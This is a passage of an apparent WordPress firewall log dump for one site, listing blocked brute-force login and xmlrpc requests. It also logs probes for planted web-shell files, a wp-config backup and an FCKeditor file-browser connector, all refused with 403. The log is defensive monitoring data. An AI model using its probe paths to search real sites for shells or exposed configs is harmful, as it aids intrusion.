Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https3a2f2fcteisys.com2fwp-admin2f&reauth=1?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','yrJCVm7IA9PzuYkcWBLgsXjt',0,1663855775.4285,540,'','POST',403,0,600,0,1,'',0),('212.1.211.12',3556889356,'','https://cteisys.com/wp-login.php?redirect_to=https3a2f2fcteisys.com2fwp-admin2f&reauth=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https3a2f2fcteisys.com2fwp-admin2f&reauth=1?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','NdLz41VlxZkORjWtB6SmgYsI',0,1663855774.4294,538,'','POST',403,0,600,0,1,'',0),('103.130.218.42',1736628778,'','https://cteisys.com/wp-login.php?redirect_to=https3a2f2fcteisys.com2fwp-admin2f&reauth=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https3a2f2fcteisys.com2fwp-admin2f&reauth=1?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','MV3vD0d2oCIjaLRQBtZEX6Un',0,1663855330.7777,494,'','POST',403,0,600,0,1,'',0),('103.130.218.42',1736628778,'','https://cteisys.com/wp-login.php?redirect_to=https3a2f2fcteisys.com2fwp-admin2f&reauth=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https3a2f2fcteisys.com2fwp-admin2f&reauth=1?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','dEXrAOoaNqmy15GHnTWeipRl',0,1663855323.8886,541,'','POST',403,0,600,0,1,'',0),('168.119.2.80',2826371664,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','cUlYgEQHsp1RyN5IejS3xWPJ',0,1663859626.5897,1614,'','POST',403,0,600,0,1,'',0),('168.119.2.80',2826371664,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','S4lf3qaQYZnRtDUOpPeN7oWL',0,1663859629.2391,658,'','POST',403,0,600,0,1,'',0),('162.144.59.224',2727361504,'','https://cteisys.com/wp-login.php?redirect_to=https3a2f2fwww.cteisys.com2fwp-admin2f&reauth=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https3a2f2fwww.cteisys.com2fwp-admin2f&reauth=1?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','jMPcsgAxbhtamQvZuXWL4oR2',0,1663859515.6308,453,'','POST',403,0,600,0,1,'',0),('162.144.59.224',2727361504,'','https://cteisys.com/wp-login.php?redirect_to=https3a2f2fwww.cteisys.com2fwp-admin2f&reauth=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https3a2f2fwww.cteisys.com2fwp-admin2f&reauth=1?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','F3UN4kR2IxKPc5QoEOYprhyS',0,1663859511.8172,448,'','POST',403,0,600,0,1,'',0),('94.237.65.250',1592607226,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','lGDJIBWfZXku7bKO84H9dM3L',0,1663859268.3062,468,'','POST',403,0,600,0,1,'',0),('94.237.65.250',1592607226,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','pezk3PqCYLy2rMXn51m6tSwN',0,1663859265.9378,1209,'','POST',403,0,600,0,1,'',0),('162.144.49.214',2727358934,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','bCBeVloKOnErqkm0GuWI1jyY',0,1663859212.6790,19254,'','POST',403,0,515,0,1,'',0),('69.163.224.107',1168367723,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.106 Safari\\/537.36\"}','LJ2hlrmU6GYe90PV1C87qOoF',0,1663895170.3812,17910,'','POST',403,0,600,0,1,'',0),('136.243.118.43',2297656875,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','5D8gNucIj2hQZYado7KEizsA',0,1663898664.3759,623,'','POST',403,0,600,0,1,'',0),('190.169.30.9',3198754313,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','4WuXHMdzKSDkPlE9xV0wCJU2',0,1663898515.0298,2476,'','POST',403,0,515,0,1,'',0),('81.88.52.221',1364735197,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','zHUaDuhjvNwGJFRT136yik85',0,1663906478.7091,17385,'','POST',403,0,600,0,1,'',0),('139.59.96.126',2335924350,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\"}','VBsQOumtaChkGZJLxSR609MY',0,1663933327.9868,17392,'','POST',403,0,600,0,1,'',0),('157.0.140.186',2634058938,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','BLaFbvP9yOwIWcq5QhYrZxfl',0,1663932962.1727,630,'','POST',403,0,600,0,1,'',0),('67.227.251.154',1139014554,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','0wxi8g7UEqT4ejNlHRJY3ZzW',0,1663932404.3279,651,'','POST',403,0,600,0,1,'',0),('162.219.250.15',2732325391,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','klMvOUba8hgrCYZsnyHRQ37W',0,1663931209.1918,626,'','POST',403,0,600,0,1,'',0),('139.59.85.224',2335921632,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.140 Safari\\/537.36\"}','FzPyYqp1sjCh7fN4rIlXSU86',0,1663931893.7059,18619,'','POST',403,0,600,0,1,'',0),('142.93.132.111',2388493423,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','y0oF2OM8nUEYSIju1crN6JTv',0,1663941771.8052,1645,'','POST',403,0,515,0,1,'',0),('51.91.151.60',861640508,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.75 Safari\\/537.36\"}','nIRwtMOTjdzEH8ap20QWiJCg',0,1663941968.0878,1359,'','POST',403,0,600,0,1,'',0),('51.210.53.165',869414309,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Jg4zNohpFRZUvQ1OeDbWsuVm',0,1663946206.9595,1472,'','POST',403,0,515,0,1,'',0),('213.152.187.235',3583556587,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','JcCKPbjpQ5qvnTfoUGwIk80L',0,1663946101.5686,18615,'','POST',403,0,515,0,1,'',0),('190.145.68.131',3197191299,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','xhipMkrFVAcaRZNu0d38USzY',0,1663945760.6869,1520,'','POST',403,0,515,0,1,'',0),('185.93.182.171',3109926571,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','8ZqYihDNvE3cTCJUBujd0fKe',0,1663945228.6277,1400,'','POST',403,0,515,0,1,'',0),('107.180.103.185',1806985145,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','0jakOcTeNL9YXDUvKFob2w3J',0,1663945324.5266,1170,'','POST',403,0,515,0,1,'',0),('167.172.67.151',2813084567,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Y2jMoRaBb8dnpglwvqhU9HE7',0,1663955828.7058,1249,'','POST',403,0,515,0,1,'',0),('154.0.175.35',2583736099,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','hmteV04jp3T8HfOgbylIEwzF',0,1663955221.8807,1314,'','POST',403,0,515,0,1,'',0),('192.30.89.27',3223214363,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','kEVYhPaO3n0LxUIfX7sNi9MJ',0,1663955375.3987,1356,'','POST',403,0,515,0,1,'',0),('140.246.255.164',2364997540,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','TUvuj9HaLkVrSp27NBZ5Xdti',0,1663954577.3524,2381,'','POST',403,0,515,0,1,'',0),('1.116.44.97',24390753,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','qIV3O9epRoEjDH2J4k6SlhCK',0,1663954893.5376,1301,'','POST',403,0,515,0,1,'',0),('115.79.139.135',1934592903,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','xWE0jgcdvUsyDFAPBLCXaISo',0,1663955025.6355,1400,'','POST',403,0,600,0,1,'',0),('124.222.127.109',2094956397,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','jGgahlfREbsWX1xpzkuic7nA',0,1663953948.0235,2923,'','POST',403,0,515,0,1,'',0),('142.93.201.0',2388510976,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/53.0.2785.143 Safari\\/537.36\"}','XiI7ehDMCmoA0TzrQa9gpFEl',0,1663953616.2210,551,'','POST',403,0,600,0,1,'',0),('194.163.159.35',3265503011,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','h1gdYu2fCTnJ9RxA7wb6MBOm',0,1663953609.6600,1786,'','POST',403,0,515,0,1,'',0),('107.180.107.103',1806986087,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','3aZRIOPsDzM9uQyhHcTJdB1b',0,1663953246.1166,18830,'','POST',403,0,515,0,1,'',0),('47.105.73.13',795429133,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/54.0.2840.99 Safari\\/537.36\"}','0dMcvXkPRb3ugWKjBlHeZEwC',0,1663953576.5365,17774,'','POST',403,0,600,0,1,'',0),('35.198.25.12',600185100,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','KbaonWs2lONLvCU1EXuH8Tqf',0,1663952610.2523,2668,'','POST',403,0,515,0,1,'',0),('188.166.163.52',3165037364,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','riMupj1TXWOvZYCJ2yBAgR4V',0,1663952931.3969,1688,'','POST',403,0,515,0,1,'',0),('162.0.216.181',2717964469,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ShLmE61F5R9eH0GXBZbjcWnC',0,1663959772.5162,1308,'','POST',403,0,515,0,1,'',0),('57.128.45.42',964701482,'','https://cteisys.com/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','vE5Lx6wkmQ4IYjAiUOW7ndG8',0,1663986340.3164,301,'','GET',403,0,700,0,1,'',0),('72.167.34.14',1218912782,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','l6yr7G9qTvSZI3dmwcBeAxzo',0,1663985059.1273,18183,'','POST',403,0,600,0,1,'',0),('57.128.45.42',964701482,'','http://cteisys.com/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','dXflOCsqgPTIukN8bJSxjK4z',0,1663986323.1911,12270,'','GET',403,0,700,0,1,'',0),('161.35.126.102',2703457894,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','lbWQ2TR9NnGYpwg7HXLJcuCU',0,1663999765.2962,17571,'','POST',403,0,600,0,1,'',0),('190.92.159.48',3193741104,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','jBE9vOGaeprqKw817AWuFSUL',0,1664013672.3696,1896,'','POST',403,0,515,0,1,'',0),('137.184.209.117',2310590837,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ZMp6nYkCrjfeUwVR9L0OKodX',0,1664064324.9792,19128,'','POST',403,0,515,0,1,'',0),('118.24.106.172',1981311660,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.193 Safari\\/537.36\"}','t7S09HaZIkwRdiUKNpn24yxg',0,1664092991.1515,17663,'','POST',403,0,600,0,1,'',0),('175.178.125.173',2947710381,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','m1kadGcFRrZ064ELT385ihUf',0,1664105239.6247,17403,'','POST',403,0,600,0,1,'',0),('185.2.4.134',3103917190,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.86 Safari\\/537.36\"}','932Nk8pa7LKfMnE6Wo1tuBeP',0,1664102959.9326,1375,'','POST',403,0,600,0,1,'',0),('34.75.65.218',575357402,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','ktiYhEopxQNFW4B9SJzRc6f2',0,1664102146.7661,2078,'','POST',403,0,600,0,1,'',0),('151.106.41.64',2540316992,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','9zIm2rfw7Ag1K40OshbGidoY',0,1664101410.4156,1203,'','POST',403,0,600,0,1,'',0),('167.71.117.225',2806478305,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','tfk2lALP9RcbaGK6eJXU5Vvw',0,1664104507.4896,2306,'','POST',403,0,600,0,1,'',0),('104.131.68.19',1753433107,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36\"}','fGdbg2NDzR8xC516M47LE3it',0,1664103694.6818,16250,'','POST',403,0,600,0,1,'',0),('157.245.110.251',2650107643,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','6gDcsK0lbFOQHV4M7anUpZ1q',0,1664109881.1367,1187,'','POST',403,0,600,0,1,'',0),('213.152.162.94',3583550046,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','xe3ojtmWGTVRludrhpS2gJsU',0,1664109420.5964,2349,'','POST',403,0,515,0,1,'',0),('13.81.59.92',223427420,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.106 Safari\\/537.36\"}','neaw6HqEd5CIh30OMWFmV8kX',0,1664109149.0363,32461,'','POST',403,0,600,0,1,'',0),('208.113.171.103',3497110375,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.97 Safari\\/537.36\"}','RD6Iva5mkYCUru2J4iZ3wonj',0,1664108328.9257,1600,'','POST',403,0,600,0,1,'',0),('81.88.52.221',1364735197,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','h1rdgFozZMcENlWGSf73puYm',0,1664107597.4513,17410,'','POST',403,0,600,0,1,'',0),('69.163.224.107',1168367723,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/49.0.2623.112 Safari\\/537.36\"}','z9cP7v4ZKEpfnBgUSYi3Nmot',0,1664113813.3121,1181,'','POST',403,0,600,0,1,'',0),('43.251.134.195',737904323,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','BH2nKEclOdMzhisGQrZvPDk4',0,1664112252.4003,17633,'','POST',403,0,600,0,1,'',0),('184.75.221.180',3091979700,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','yez2tQRT6LVhfU4vgFC3cxpw',0,1664111586.3058,2294,'','POST',403,0,515,0,1,'',0),('207.46.234.202',3475958474,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','tuIdKmS7n1bPFcvelwO3QpoB',0,1664111432.9591,11562,'','POST',403,0,600,0,1,'',0),('51.195.148.190',868455614,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/58.0.3029.110 Safari\\/537.36\"}','o5dJR7qOGupkg9wxyKcEt34n',0,1664115369.3741,6002,'','POST',403,0,600,0,1,'',0),('57.128.45.42',964701482,'','https://cteisys.com/wp-includes/shell20211028.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','6bUsComESTBLZtWYkv1zfadc',0,1664115029.8050,309,'','GET',403,0,700,0,1,'',0),('57.128.45.42',964701482,'','http://cteisys.com/wp-includes/shell20211028.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','gOxBApECd4YnVylZb8Gh1c5u',0,1664115004.9413,11642,'','GET',403,0,700,0,1,'',0),('103.130.218.189',1736628925,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.87 Safari\\/537.36\"}','25tHiWoALXPDJ6Mv4VaUQ7pw',0,1664114551.3193,1538,'','POST',403,0,600,0,1,'',0),('37.115.114.47',628322863,'','http://cteisys.com/wp-config.php.original','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','5CkoeaLZv7RjBds1Oh9u4c0Q',0,1664153701.0195,325,'','GET',403,0,700,0,1,'',0),('213.152.162.181',3583550133,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','H2zp6OToBJxA3LNckiuMKatw',0,1664120894.4483,18514,'','POST',403,0,515,0,1,'',0),('47.105.73.13',795429133,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','Zhb65f9kXdTjpeH081uIDtoa',0,1664120070.3457,1327,'','POST',403,0,600,0,1,'',0),('120.25.104.120',2014931064,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36\"}','56uZTt90E4VcSqrfGJnFz1XI',0,1664119238.4535,14108,'','POST',403,0,600,0,1,'',0),('139.59.82.122',2335920762,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','X9FxZe43OQIunCvcDkpyfAgB',0,1664118493.8676,17943,'','POST',403,0,600,0,1,'',0),('213.152.161.118',3583549814,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','IZLesF5nykHGgOob7pmUq3D0',0,1664125088.5365,18372,'','POST',403,0,515,0,1,'',0),('51.15.183.168',856668072,'','http://cteisys.com/js/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/75.0.3770.100 Safari\\/537.36\"}','4BZj5YLd92arsyhQTeCbulgk',0,1664122109.0987,315,'','GET',403,0,700,0,1,'',0),('35.194.233.240',599976432,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','a53CuOycL1Z8GMqKYQmp6Tse',0,1664153168.8778,2327,'','POST',403,0,515,0,1,'',0),('57.128.45.42',964701482,'','https://cteisys.com/wp-includes/shell20211028.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','4fMCaNFSE5i9cvp6GkmTeLUg',0,1664152604.1280,308,'','GET',403,0,700,0,1,'',0),('57.128.45.42',964701482,'','http://cteisys.com/wp-includes/shell20211028.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','tPzmbF5HWJ368Dgr0ikxCYj2',0,1664152599.2917,266,'','GET',403,0,700,0,1,'',0),('213.152.161.240',3583549936,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','zNAMvjFWr5eXdUPysa0n27Dh',0,1664126453.8956,18808,'','POST',403,0,515,0,1,'',0),('185.156.175.43',3114053419,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','vnsIzQuUq4CFidftBVmOHN8j',0,1664130799.3070,1374,'','POST',403,0,515,0,1,'',0),('199.249.230.32',3355043360,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) 